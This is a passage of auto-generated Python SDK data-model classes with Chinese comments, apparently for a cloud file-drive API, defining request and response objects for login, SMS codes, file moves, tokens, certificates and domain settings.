# 国家编号,默认86,不需要填+号,直接填数字
self.phone_region = phone_region
# 短信验证码内容,使用密码登录此参数不生效
self.sms_code = sms_code
# 短信验证码ID,使用密码登录此参数不生效
self.sms_code_id = sms_code_id
def validate(self):
self.validate_required(self.app_id, 'app_id')
self.validate_required(self.nvc_param, 'nvc_param')
self.validate_required(self.phone_number, 'phone_number')
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.app_id is not None:
result['app_id'] = self.app_id
if self.auto_register is not None:
result['auto_register'] = self.auto_register
if self.captcha_id is not None:
result['captcha_id'] = self.captcha_id
if self.captcha_text is not None:
result['captcha_text'] = self.captcha_text
if self.encrypted_key is not None:
result['encrypted_key'] = self.encrypted_key
if self.nvc_param is not None:
result['nvc_param'] = self.nvc_param
if self.password is not None:
result['password'] = self.password
if self.phone_number is not None:
result['phone_number'] = self.phone_number
if self.phone_region is not None:
result['phone_region'] = self.phone_region
if self.sms_code is not None:
result['sms_code'] = self.sms_code
if self.sms_code_id is not None:
result['sms_code_id'] = self.sms_code_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('app_id') is not None:
self.app_id = m.get('app_id')
if m.get('auto_register') is not None:
self.auto_register = m.get('auto_register')
if m.get('captcha_id') is not None:
self.captcha_id = m.get('captcha_id')
if m.get('captcha_text') is not None:
self.captcha_text = m.get('captcha_text')
if m.get('encrypted_key') is not None:
self.encrypted_key = m.get('encrypted_key')
if m.get('nvc_param') is not None:
self.nvc_param = m.get('nvc_param')
if m.get('password') is not None:
self.password = m.get('password')
if m.get('phone_number') is not None:
self.phone_number = m.get('phone_number')
if m.get('phone_region') is not None:
self.phone_region = m.get('phone_region')
if m.get('sms_code') is not None:
self.sms_code = m.get('sms_code')
if m.get('sms_code_id') is not None:
self.sms_code_id = m.get('sms_code_id')
return self
class MobileRegisterRequest(TeaModel):
"""
*\
"""
def __init__(
self,
headers: Dict[str, str] = None,
app_id: str = None,
nvc_param: str = None,
phone_number: str = None,
phone_region: str = None,
sms_code: str = None,
sms_code_id: str = None,
):
self.headers = headers
# App ID, 当前访问的App
self.app_id = app_id
# 环境参数
self.nvc_param = nvc_param
# 待查询的手机号
self.phone_number = phone_number
# 国家编号,默认86,不需要填+号,直接填数字
self.phone_region = phone_region
# 短信验证码内容
self.sms_code = sms_code
# 短信验证码ID
self.sms_code_id = sms_code_id
def validate(self):
self.validate_required(self.app_id, 'app_id')
self.validate_required(self.nvc_param, 'nvc_param')
self.validate_required(self.phone_number, 'phone_number')
self.validate_required(self.sms_code, 'sms_code')
self.validate_required(self.sms_code_id, 'sms_code_id')
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.app_id is not None:
result['app_id'] = self.app_id
if self.nvc_param is not None:
result['nvc_param'] = self.nvc_param
if self.phone_number is not None:
result['phone_number'] = self.phone_number
if self.phone_region is not None:
result['phone_region'] = self.phone_region
if self.sms_code is not None:
result['sms_code'] = self.sms_code
if self.sms_code_id is not None:
result['sms_code_id'] = self.sms_code_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('app_id') is not None:
self.app_id = m.get('app_id')
if m.get('nvc_param') is not None:
self.nvc_param = m.get('nvc_param')
if m.get('phone_number') is not None:
self.phone_number = m.get('phone_number')
if m.get('phone_region') is not None:
self.phone_region = m.get('phone_region')
if m.get('sms_code') is not None:
self.sms_code = m.get('sms_code')
if m.get('sms_code_id') is not None:
self.sms_code_id = m.get('sms_code_id')
return self
class MobileSendSmsCodeRequest(TeaModel):
"""
*\
"""
def __init__(
self,
headers: Dict[str, str] = None,
app_id: str = None,
captcha_id: str = None,
captcha_text: str = None,
nvc_param: str = None,
phone_number: str = None,
phone_region: str = None,
type: str = None,
):
self.headers = headers
# App ID, 当前访问的App
self.app_id = app_id
# 图片验证码ID
self.captcha_id = captcha_id
# 用户输入的验证码值
self.captcha_text = captcha_text
# 环境参数
self.nvc_param = nvc_param
# 待发送验证短信的手机号
self.phone_number = phone_number
# 国家编号,默认86,不需要填+号,直接填数字
self.phone_region = phone_region
# 验证码用途, 可下发: login、register、change_password
self.type = type
def validate(self):
self.validate_required(self.app_id, 'app_id')
self.validate_required(self.nvc_param, 'nvc_param')
self.validate_required(self.phone_number, 'phone_number')
self.validate_required(self.type, 'type')
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.app_id is not None:
result['app_id'] = self.app_id
if self.captcha_id is not None:
result['captcha_id'] = self.captcha_id
if self.captcha_text is not None:
result['captcha_text'] = self.captcha_text
if self.nvc_param is not None:
result['nvc_param'] = self.nvc_param
if self.phone_number is not None:
result['phone_number'] = self.phone_number
if self.phone_region is not None:
result['phone_region'] = self.phone_region
if self.type is not None:
result['type'] = self.type
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('app_id') is not None:
self.app_id = m.get('app_id')
if m.get('captcha_id') is not None:
self.captcha_id = m.get('captcha_id')
if m.get('captcha_text') is not None:
self.captcha_text = m.get('captcha_text')
if m.get('nvc_param') is not None:
self.nvc_param = m.get('nvc_param')
if m.get('phone_number') is not None:
self.phone_number = m.get('phone_number')
if m.get('phone_region') is not None:
self.phone_region = m.get('phone_region')
if m.get('type') is not None:
self.type = m.get('type')
return self
class MoveFileResponse(TeaModel):
"""
文件移动 response
"""
def __init__(
self,
async_task_id: str = None,
domain_id: str = None,
drive_id: str = None,
file_id: str = None,
):
# async_task_id
self.async_task_id = async_task_id
# DomainID
self.domain_id = domain_id
# drive_id
self.drive_id = drive_id
# file_id
self.file_id = file_id
def validate(self):
if self.domain_id is not None:
self.validate_pattern(self.domain_id, 'domain_id', '[a-z0-9A-Z]+')
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
if self.file_id is not None:
self.validate_max_length(self.file_id, 'file_id', 50)
self.validate_pattern(self.file_id, 'file_id', '[a-z0-9]{1,50}')
def to_map(self):
result = dict()
if self.async_task_id is not None:
result['async_task_id'] = self.async_task_id
if self.domain_id is not None:
result['domain_id'] = self.domain_id
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.file_id is not None:
result['file_id'] = self.file_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('async_task_id') is not None:
self.async_task_id = m.get('async_task_id')
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('file_id') is not None:
self.file_id = m.get('file_id')
return self
class PreHashCheckSuccessResponse(TeaModel):
"""
Pre hash check Response
"""
def __init__(
self,
code: str = None,
file_name: str = None,
message: str = None,
parent_file_id: str = None,
pre_hash: str = None,
):
# code
self.code = code
# file_name
self.file_name = file_name
# message
self.message = message
# parent_file_id
self.parent_file_id = parent_file_id
# pre_hash
self.pre_hash = pre_hash
def validate(self):
self.validate_required(self.parent_file_id, 'parent_file_id')
if self.parent_file_id is not None:
self.validate_max_length(self.parent_file_id, 'parent_file_id', 50)
self.validate_pattern(self.parent_file_id, 'parent_file_id', '[a-z0-9]{1,50}')
def to_map(self):
result = dict()
if self.code is not None:
result['code'] = self.code
if self.file_name is not None:
result['file_name'] = self.file_name
if self.message is not None:
result['message'] = self.message
if self.parent_file_id is not None:
result['parent_file_id'] = self.parent_file_id
if self.pre_hash is not None:
result['pre_hash'] = self.pre_hash
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('code') is not None:
self.code = m.get('code')
if m.get('file_name') is not None:
self.file_name = m.get('file_name')
if m.get('message') is not None:
self.message = m.get('message')
if m.get('parent_file_id') is not None:
self.parent_file_id = m.get('parent_file_id')
if m.get('pre_hash') is not None:
self.pre_hash = m.get('pre_hash')
return self
class VerifyTokenResponse(TeaModel):
"""
*\
"""
def __init__(
self,
token: str = None,
ttl: int = None,
url: str = None,
):
# 实人认证的Token
self.token = token
# 实人认证token有效秒数,如1800
self.ttl = ttl
# 实人认证的URL,包含Token
self.url = url
def validate(self):
self.validate_required(self.token, 'token')
self.validate_required(self.ttl, 'ttl')
self.validate_required(self.url, 'url')
def to_map(self):
result = dict()
if self.token is not None:
result['token'] = self.token
if self.ttl is not None:
result['ttl'] = self.ttl
if self.url is not None:
result['url'] = self.url
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('token') is not None:
self.token = m.get('token')
if m.get('ttl') is not None:
self.ttl = m.get('ttl')
if m.get('url') is not None:
self.url = m.get('url')
return self
class RPVerifyTokenResponse(TeaModel):
"""
*\
"""
def __init__(
self,
need_rp_verify: bool = None,
verify_token: VerifyTokenResponse = None,
):
# 是否需要实人认证,如果用户已通过认证,或者未开启实人认证,返回false
self.need_rp_verify = need_rp_verify
self.verify_token = verify_token
def validate(self):
self.validate_required(self.need_rp_verify, 'need_rp_verify')
self.validate_required(self.verify_token, 'verify_token')
if self.verify_token:
self.verify_token.validate()
def to_map(self):
result = dict()
if self.need_rp_verify is not None:
result['need_rp_verify'] = self.need_rp_verify
if self.verify_token is not None:
result['verify_token'] = self.verify_token.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('need_rp_verify') is not None:
self.need_rp_verify = m.get('need_rp_verify')
if m.get('verify_token') is not None:
temp_model = VerifyTokenResponse()
self.verify_token = temp_model.from_map(m['verify_token'])
return self
class RefreshOfficeEditTokenResponse(TeaModel):
"""
刷新office文档在线编辑凭证 response
"""
def __init__(
self,
office_access_token: str = None,
office_refresh_token: str = None,
):
# AccessToken
self.office_access_token = office_access_token
# RefreshToken
self.office_refresh_token = office_refresh_token
def validate(self):
pass
def to_map(self):
result = dict()
if self.office_access_token is not None:
result['office_access_token'] = self.office_access_token
if self.office_refresh_token is not None:
result['office_refresh_token'] = self.office_refresh_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('office_access_token') is not None:
self.office_access_token = m.get('office_access_token')
if m.get('office_refresh_token') is not None:
self.office_refresh_token = m.get('office_refresh_token')
return self
class RemoveStoreRequest(TeaModel):
"""
*\
"""
def __init__(
self,
domain_id: str = None,
store_id: str = None,
):
# domain ID
self.domain_id = domain_id
# store ID
self.store_id = store_id
def validate(self):
self.validate_required(self.domain_id, 'domain_id')
self.validate_required(self.store_id, 'store_id')
def to_map(self):
result = dict()
if self.domain_id is not None:
result['domain_id'] = self.domain_id
if self.store_id is not None:
result['store_id'] = self.store_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
if m.get('store_id') is not None:
self.store_id = m.get('store_id')
return self
class RevokeRequest(TeaModel):
"""
*\
"""
def __init__(
self,
headers: Dict[str, str] = None,
app_id: str = None,
refresh_token: str = None,
):
self.headers = headers
# App ID, 当前访问的App
self.app_id = app_id
# refresh token, 登录时返回的
self.refresh_token = refresh_token
def validate(self):
self.validate_required(self.app_id, 'app_id')
self.validate_required(self.refresh_token, 'refresh_token')
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.app_id is not None:
result['app_id'] = self.app_id
if self.refresh_token is not None:
result['refresh_token'] = self.refresh_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('app_id') is not None:
self.app_id = m.get('app_id')
if m.get('refresh_token') is not None:
self.refresh_token = m.get('refresh_token')
return self
class ScanFileMetaResponse(TeaModel):
"""
scan file meta response
"""
def __init__(
self,
items: List[BaseCCPFileResponse] = None,
next_marker: str = None,
):
# items
self.items = items
# next_marker
self.next_marker = next_marker
def validate(self):
if self.items:
for k in self.items:
if k:
k.validate()
def to_map(self):
result = dict()
result['items'] = []
if self.items is not None:
for k in self.items:
result['items'].append(k.to_map() if k else None)
if self.next_marker is not None:
result['next_marker'] = self.next_marker
return result
def from_map(self, m: dict = None):
m = m or dict()
self.items = []
if m.get('items') is not None:
for k in m.get('items'):
temp_model = BaseCCPFileResponse()
self.items.append(temp_model.from_map(k))
if m.get('next_marker') is not None:
self.next_marker = m.get('next_marker')
return self
class SearchFileResponse(TeaModel):
"""
search file response
"""
def __init__(
self,
items: List[BaseCCPFileResponse] = None,
next_marker: str = None,
total_count: int = None,
):
# items
self.items = items
# next_marker
self.next_marker = next_marker
# total_count
self.total_count = total_count
def validate(self):
if self.items:
for k in self.items:
if k:
k.validate()
def to_map(self):
result = dict()
result['items'] = []
if self.items is not None:
for k in self.items:
result['items'].append(k.to_map() if k else None)
if self.next_marker is not None:
result['next_marker'] = self.next_marker
if self.total_count is not None:
result['total_count'] = self.total_count
return result
def from_map(self, m: dict = None):
m = m or dict()
self.items = []
if m.get('items') is not None:
for k in m.get('items'):
temp_model = BaseCCPFileResponse()
self.items.append(temp_model.from_map(k))
if m.get('next_marker') is not None:
self.next_marker = m.get('next_marker')
if m.get('total_count') is not None:
self.total_count = m.get('total_count')
return self
class SetAppPublicKeyRequest(TeaModel):
"""
*\
"""
def __init__(
self,
app_id: str = None,
public_key: str = None,
):
# App ID
self.app_id = app_id
# RSA加密算法的公钥, PEM格式
self.public_key = public_key
def validate(self):
self.validate_required(self.app_id, 'app_id')
self.validate_required(self.public_key, 'public_key')
def to_map(self):
result = dict()
if self.app_id is not None:
result['app_id'] = self.app_id
if self.public_key is not None:
result['public_key'] = self.public_key
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('app_id') is not None:
self.app_id = m.get('app_id')
if m.get('public_key') is not None:
self.public_key = m.get('public_key')
return self
class SetBizCNameCertRequest(TeaModel):
"""
*\
"""
def __init__(
self,
cert_id: str = None,
biz_cname: str = None,
cert_body: str = None,
cert_name: str = None,
cert_privatekey: str = None,
cname_type: str = None,
domain_id: str = None,
is_vpc: bool = None,
):
self.cert_id = cert_id
# biz cname
self.biz_cname = biz_cname
# cert body
self.cert_body = cert_body
# cert name
self.cert_name = cert_name
# cert privatekey
self.cert_privatekey = cert_privatekey
# cname type
self.cname_type = cname_type
# domain ID
self.domain_id = domain_id
# biz cname
self.is_vpc = is_vpc
def validate(self):
self.validate_required(self.cert_body, 'cert_body')
self.validate_required(self.cert_name, 'cert_name')
self.validate_required(self.cert_privatekey, 'cert_privatekey')
self.validate_required(self.cname_type, 'cname_type')
self.validate_required(self.domain_id, 'domain_id')
def to_map(self):
result = dict()
if self.cert_id is not None:
result['CertID'] = self.cert_id
if self.biz_cname is not None:
result['biz_cname'] = self.biz_cname
if self.cert_body is not None:
result['cert_body'] = self.cert_body
if self.cert_name is not None:
result['cert_name'] = self.cert_name
if self.cert_privatekey is not None:
result['cert_privatekey'] = self.cert_privatekey
if self.cname_type is not None:
result['cname_type'] = self.cname_type
if self.domain_id is not None:
result['domain_id'] = self.domain_id
if self.is_vpc is not None:
result['is_vpc'] = self.is_vpc
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('CertID') is not None:
self.cert_id = m.get('CertID')
if m.get('biz_cname') is not None:
self.biz_cname = m.get('biz_cname')
if m.get('cert_body') is not None:
self.cert_body = m.get('cert_body')
if m.get('cert_name') is not None:
self.cert_name = m.get('cert_name')
if m.get('cert_privatekey') is not None:
self.cert_privatekey = m.get('cert_privatekey')
if m.get('cname_type') is not None:
self.cname_type = m.get('cname_type')
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
if m.get('is_vpc') is not None:
self.is_vpc = m.get('is_vpc')
return self
class SetBizCNameRequest(TeaModel):
"""
*\
"""
def __init__(
self,
biz_cname: str = None,
cname_type: str = None,
domain_id: str = None,
is_vpc: bool = None,
):
# biz cname
self.biz_cname = biz_cname
# cname type
self.cname_type = cname_type
# domain ID
self.domain_id = domain_id
# biz cname
self.is_vpc = is_vpc
def validate(self):
self.validate_required(self.biz_cname, 'biz_cname')
self.validate_required(self.cname_type, 'cname_type')
self.validate_required(self.domain_id, 'domain_id')
def to_map(self):
result = dict()
if self.biz_cname is not None:
result['biz_cname'] = self.biz_cname
if self.cname_type is not None:
result['cname_type'] = self.cname_type
if self.domain_id is not None:
result['domain_id'] = self.domain_id
if self.is_vpc is not None:
result['is_vpc'] = self.is_vpc
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('biz_cname') is not None:
self.biz_cname = m.get('biz_cname')
if m.get('cname_type') is not None:
self.cname_type = m.get('cname_type')
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
if m.get('is_vpc') is not None:
self.is_vpc = m.get('is_vpc')
return self
class SetCorsRuleListRequest(TeaModel):
"""
list cors rule request
"""
def __init__(
self,
cors_rule_list: List[CorsRule] = None,
domain_id: str = None,
):
# cors rule list
self.cors_rule_list = cors_rule_list
# domain ID
self.domain_id = domain_id
def validate(self):
self.validate_required(self.cors_rule_list, 'cors_rule_list')
if self.cors_rule_list:
for k in self.cors_rule_list:
if k:
k.validate()
self.validate_required(self.domain_id, 'domain_id')
def to_map(self):
result = dict()
result['cors_rule_list'] = []
if self.cors_rule_list is not None:
for k in self.cors_rule_list:
result['cors_rule_list'].append(k.to_map() if k else None)
if self.domain_id is not None:
result['domain_id'] = self.domain_id
return result
def from_map(self, m: dict = None):
m = m or dict()
self.cors_rule_list = []
if m.get('cors_rule_list') is not None:
for k in m.get('cors_rule_list'):
temp_model = CorsRule()
self.cors_rule_list.append(temp_model.from_map(k))
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
return self
class SetDataCNameRequest(TeaModel):
"""
*\
"""
def __init__(
self,
data_cname: str = None,
domain_id: str = None,
location: str = None,
):
# cn-shanghai data cname
self.data_cname = data_cname
# domain ID
self.domain_id = domain_id
# location
self.location = location
def validate(self):
self.validate_required(self.data_cname, 'data_cname')
self.validate_required(self.domain_id, 'domain_id')
self.validate_required(self.location, 'location')
def to_map(self):
result = dict()
if self.data_cname is not None:
result['data_cname'] = self.data_cname
if self.domain_id is not None:
result['domain_id'] = self.domain_id
if self.location is not None:
result['location'] = self.location
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('data_cname') is not None:
self.data_cname = m.get('data_cname')
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
if m.get('location') is not None:
self.location = m.get('location')
return self
class StreamInfo(TeaModel):
"""
*\
"""
def __init__(
self,
crc_64hash: str = None,
download_url: str = None,
size: int = None,
thumbnail: str = None,
url: str = None,
):
# crc64_hash
self.crc_64hash = crc_64hash
# download_url
self.download_url = download_url
self.size = size
# thumbnail
self.thumbnail = thumbnail
# url
self.url = url
def validate(self):
pass
def to_map(self):
result = dict()
if self.crc_64hash is not None:
result['crc64_hash'] = self.crc_64hash
if self.download_url is not None:
result['download_url'] = self.download_url
if self.size is not None:
result['size'] = self.size
if self.thumbnail is not None:
result['thumbnail'] = self.thumbnail
if self.url is not None:
result['url'] = self.url
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('crc64_hash') is not None:
self.crc_64hash = m.get('crc64_hash')
if m.get('download_url') is not None:
self.download_url = m.get('download_url')
if m.get('size') is not None:
self.size = m.get('size')
if m.get('thumbnail') is not None:
self.thumbnail = m.get('thumbnail')
if m.get('url') is not None:
self.url = m.get('url')
return self
class StreamUploadInfo(TeaModel):
"""
*\
"""
def __init__(
self,
location: str = None,
part_info_list: List[UploadPartInfo] = None,
pre_rapid_upload: bool = None,
rapid_upload: bool = None,
upload_id: str = None,
):
# location
self.location = location
# part_info_list
self.part_info_list = part_info_list
# pre_rapid_upload
type: boolean
self.pre_rapid_upload = pre_rapid_upload
# rapid_upload
type: boolean
self.rapid_upload = rapid_upload
# upload_id
self.upload_id = upload_id
def validate(self):
if self.part_info_list:
for k in self.part_info_list:
if k:
k.validate()
def to_map(self):
result = dict()
if self.location is not None:
result['location'] = self.location
result['part_info_list'] = []
if self.part_info_list is not None:
for k in self.part_info_list:
result['part_info_list'].append(k.to_map() if k else None)
if self.pre_rapid_upload is not None:
result['pre_rapid_upload'] = self.pre_rapid_upload
if self.rapid_upload is not None:
result['rapid_upload'] = self.rapid_upload
if self.upload_id is not None:
result['upload_id'] = self.upload_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('location') is not None:
self.location = m.get('location')
self.part_info_list = []
if m.get('part_info_list') is not None:
for k in m.get('part_info_list'):
temp_model = UploadPartInfo()
self.part_info_list.append(temp_model.from_map(k))
if m.get('pre_rapid_upload') is not None:
self.pre_rapid_upload = m.get('pre_rapid_upload')
if m.get('rapid_upload') is not None:
self.rapid_upload = m.get('rapid_upload')
if m.get('upload_id') is not None:
self.upload_id = m.get('upload_id')
return self
class TokenRequest(TeaModel):
"""
*\
"""
def __init__(
self,
assertion: str = None,
client_id: str = None,
client_secret: str = None,
code: str = None,
device_code: str = None,
grant_type: str = None,
redirect_uri: str = None,
refresh_token: str = None,
):
# JWT方式授权需要传此参数,传入JWT签名的声明,用于更换accessToken
self.assertion = assertion
# Client ID, 此处填写创建App时返回的AppID
self.client_id = client_id
# Client ID, 此处填写创建App时返回的AppSecret
self.client_secret = client_secret
# 认证后回调参数中的code
self.code = code
# OAuth2.0 device flow换取token参数
self.device_code = device_code
# 通过code获取accessToken或者通过refresh_token获取accessToken
self.grant_type = grant_type
# 回调地址, 此处填写创建App时填写的回调地址,OAuth方式登录时需要传入
self.redirect_uri = redirect_uri
# 刷新accessToken使用的refreshToken
self.refresh_token = refresh_token
def validate(self):
self.validate_required(self.client_id, 'client_id')
self.validate_required(self.client_secret, 'client_secret')
self.validate_required(self.grant_type, 'grant_type')
def to_map(self):
result = dict()
if self.assertion is not None:
result['Assertion'] = self.assertion
if self.client_id is not None:
result['ClientID'] = self.client_id
if self.client_secret is not None:
result['ClientSecret'] = self.client_secret
if self.code is not None:
result['Code'] = self.code
if self.device_code is not None:
result['DeviceCode'] = self.device_code
if self.grant_type is not None:
result['GrantType'] = self.grant_type
if self.redirect_uri is not None:
result['RedirectUri'] = self.redirect_uri
if self.refresh_token is not None:
result['RefreshToken'] = self.refresh_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('Assertion') is not None:
self.assertion = m.get('Assertion')
if m.get('ClientID') is not None:
self.client_id = m.get('ClientID')
if m.get('ClientSecret') is not None:
self.client_secret = m.get('ClientSecret')
if m.get('Code') is not None:
self.code = m.get('Code')
if m.get('DeviceCode') is not None:
self.device_code = m.get('DeviceCode')
if m.get('GrantType') is not None:
self.grant_type = m.get('GrantType')
if m.get('RedirectUri') is not None:
self.redirect_uri = m.get('RedirectUri')
if m.get('RefreshToken') is not None:
self.refresh_token = m.get('RefreshToken')
return self
class UpdateAppRequest(TeaModel):
"""
*\
"""
def __init__(
self,
app_id: str = None,
app_name: str = None,
description: str = None,
logo: str = None,
redirect_uri: str = None,
scope: List[str] = None,
type: str = None,
):
# App ID
self.app_id = app_id
# App名称
self.app_name = app_name
# App描述
self.description = description
# App图标
self.logo = logo
# App回调地址
self.redirect_uri = redirect_uri
# App权限列表
self.scope = scope
# App类型
self.type = type
def validate(self):
self.validate_required(self.app_id, 'app_id')
if self.app_name is not None:
self.validate_max_length(self.app_name, 'app_name', 128)
if self.description is not None:
self.validate_max_length(self.description, 'description', 1024)
def to_map(self):
result = dict()
if self.app_id is not None:
result['app_id'] = self.app_id
if self.app_name is not None:
result['app_name'] = self.app_name
if self.description is not None:
result['description'] = self.description
if self.logo is not None:
result['logo'] = self.logo
if self.redirect_uri is not None:
result['redirect_uri'] = self.redirect_uri
if self.scope is not None:
result['scope'] = self.scope
if self.type is not None:
result['type'] = self.type
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('app_id') is not None:
self.app_id = m.get('app_id')
if m.get('app_name') is not None:
self.app_name = m.get('app_name')
if m.get('description') is not None:
self.description = m.get('description')
if m.get('logo') is not None:
self.logo = m.get('logo')
if m.get('redirect_uri') is not None:
self.redirect_uri = m.get('redirect_uri')
if m.get('scope') is not None:
self.scope = m.get('scope')
if m.get('type') is not None:
self.type = m.get('type')
return self
class UpdateDomainRequest(TeaModel):
"""
update domain request
"""
def __init__(
self,
auth_config: dict = None,
auth_dingding_app_id: str = None,
auth_dingding_app_secret: str = None,
auth_dingding_enable: bool = None,
auth_endpoint_enable: bool = None,
auth_ram_app_id: str = None,
auth_ram_app_secret: str = None,
auth_ram_enable: bool = None,
data_hash_name: str = None,
description: str = None,
domain_id: str = None,
domain_name: str = None,
event_filename_matches: str = None,
event_mns_endpoint: str = None,
event_mns_topic: str = None,
event_names: List[str] = None,
event_role_arn: str = None,
init_drive_enable: bool = None,
init_drive_size: int = None,
init_drive_store_id: str = None,
published_app_access_strategy: AppAccessStrategy = None,
sharable: bool = None,
):
self.auth_config = auth_config
# 钉钉 App Id
self.auth_dingding_app_id = auth_dingding_app_id
# 钉钉 App Secret
self.auth_dingding_app_secret = auth_dingding_app_secret
# 启用钉钉认证
self.auth_dingding_enable = auth_dingding_enable
self.auth_endpoint_enable = auth_endpoint_enable
# RAM App Id
self.auth_ram_app_id = auth_ram_app_id
# RAM App Secret
self.auth_ram_app_secret = auth_ram_app_secret
# 启用 RAM 认证
self.auth_ram_enable = auth_ram_enable
# 数据 Hash 算法
self.data_hash_name = data_hash_name
# Domain 描述
self.description = description
# Domain ID
self.domain_id = domain_id
# Domain 名称
self.domain_name = domain_name
# 事件通知 MNS 匹配文件名
self.event_filename_matches = event_filename_matches
# 事件通知 MNS Endpoint
self.event_mns_endpoint = event_mns_endpoint
# 事件通知 MNS Topic
self.event_mns_topic = event_mns_topic
# 事件名列表
self.event_names = event_names
# 事件通知 Role Arn
self.event_role_arn = event_role_arn
# 开启自动初始化 Drive
self.init_drive_enable = init_drive_enable
# 自动初始化 Drive 大小
self.init_drive_size = init_drive_size
# 自动初始化 Drive 使用 Store ID
self.init_drive_store_id = init_drive_store_id
self.published_app_access_strategy = published_app_access_strategy
# 开启分享
self.sharable = sharable
def validate(self):
self.validate_required(self.domain_id, 'domain_id')
if self.published_app_access_strategy:
self.published_app_access_strategy.validate()
def to_map(self):
result = dict()
if self.auth_config is not None:
result['auth_config'] = self.auth_config
if self.auth_dingding_app_id is not None:
result['auth_dingding_app_id'] = self.auth_dingding_app_id
if self.auth_dingding_app_secret is not None:
result['auth_dingding_app_secret'] = self.auth_dingding_app_secret
if self.auth_dingding_enable is not None:
result['auth_dingding_enable'] = self.auth_dingding_enable
if self.auth_endpoint_enable is not None:
result['auth_endpoint_enable'] = self.auth_endpoint_enable
if self.auth_ram_app_id is not None:
result['auth_ram_app_id'] = self.auth_ram_app_id
if self.auth_ram_app_secret is not None:
result['auth_ram_app_secret'] = self.auth_ram_app_secret
if self.auth_ram_enable is not None:
result['auth_ram_enable'] = self.auth_ram_enable
if self.data_hash_name is not None:
result['data_hash_name'] = self.data_hash_name
if self.description is not None:
result['description'] = self.description
if self.domain_id is not None:
result['domain_id'] = self.domain_id
if self.domain_name is not None:
result['domain_name'] = self.domain_name
if self.event_filename_matches is not None:
result['event_filename_matches'] = self.event_filename_matches
if self.event_mns_endpoint is not None:
result['event_mns_endpoint'] = self.event_mns_endpoint
if self.event_mns_topic is not None:
result['event_mns_topic'] = self.event_mns_topic
if self.event_names is not None:
result['event_names'] = self.event_names
if self.event_role_arn is not None:
result['event_role_arn'] = self.event_role_arn
if self.init_drive_enable is not None:
result['init_drive_enable'] = self.init_drive_enable
if self.init_drive_size is not None:
result['init_drive_size'] = self.init_drive_size
if self.init_drive_store_id is not None:
result['init_drive_store_id'] = self.init_drive_store_id
if self.published_app_access_strategy is not None:
result['published_app_access_strategy'] = self.published_app_access_strategy.to_map()
if self.sharable is not None:
result['sharable'] = self.sharable
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('auth_config') is not None:
self.auth_config = m.get('auth_config')
if m.get('auth_dingding_app_id') is not None:
self.auth_dingding_app_id = m.get('auth_dingding_app_id')
if m.get('auth_dingding_app_secret') is not None:
self.auth_dingding_app_secret = m.get('auth_dingding_app_secret')
if m.get('auth_dingding_enable') is not None:
self.auth_dingding_enable = m.get('auth_dingding_enable')
if m.get('auth_endpoint_enable') is not None:
self.auth_endpoint_enable = m.get('auth_endpoint_enable')
if m.get('auth_ram_app_id') is not None:
self.auth_ram_app_id = m.get('auth_ram_app_id')
if m.get('auth_ram_app_secret') is not None:
self.auth_ram_app_secret = m.get('auth_ram_app_secret')
if m.get('auth_ram_enable') is not None:
self.auth_ram_enable = m.get('auth_ram_enable')
if m.get('data_hash_name') is not None:
self.data_hash_name = m.get('data_hash_name')
if m.get('description') is not None:
self.description = m.get('description')
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
if m.get('domain_name') is not None:
self.domain_name = m.get('domain_name')
if m.get('event_filename_matches') is not None:
self.event_filename_matches = m.get('event_filename_matches')
if m.get('event_mns_endpoint') is not None:
self.event_mns_endpoint = m.get('event_mns_endpoint')
if m.get('event_mns_topic') is not None:
self.event_mns_topic = m.get('event_mns_topic')
if m.get('event_names') is not None:
self.event_names = m.get('event_names')
if m.get('event_role_arn') is not None:
self.event_role_arn = m.get('event_role_arn')
if m.get('init_drive_enable') is not None:
self.init_drive_enable = m.get('init_drive_enable')
if m.get('init_drive_size') is not None:
self.init_drive_size = m.get('init_drive_size')
if m.get('init_drive_store_id') is not None:
self.init_drive_store_id = m.get('init_drive_store_id')
if m.get('published_app_access_strategy') is not None:
temp_model = AppAccessStrategy()
self.published_app_access_strategy = temp_model.from_map(m['published_app_access_strategy'])
if m.get('sharable') is not None:
self.sharable = m.get('sharable')
return self
class UpdateDriveResponse(TeaModel):
"""
Update drive response
"""
def __init__(
self,
creator: str = None,
description: str = None,
domain_id: str = None,
drive_id: str = None,
drive_name: str = None,
drive_type: str = None,
encrypt_data_access: bool = None,
encrypt_mode: str = None,
owner: str = None,
relative_path: str = None,
status: str = None,
store_id: str = None,
total_size: int = None,
used_size: int = None,
):
